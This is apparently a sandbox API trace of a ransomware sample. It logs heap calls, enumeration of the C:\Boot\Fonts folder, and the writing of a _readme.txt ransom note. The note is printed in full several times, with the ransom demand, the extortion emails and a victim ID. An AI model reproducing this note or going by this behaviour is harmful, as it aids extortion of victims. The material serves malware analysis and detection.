[0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.187] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0056.187] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.187] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.187] PathFindFileNameW (pszPath="") returned="" [0056.187] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.188] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.188] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.188] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.188] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0056.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.188] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0056.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.189] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.189] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.189] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.191] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.191] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.192] CloseHandle (hObject=0x5c8) returned 1 [0056.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.193] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.193] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.193] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.193] HeapFree (in: 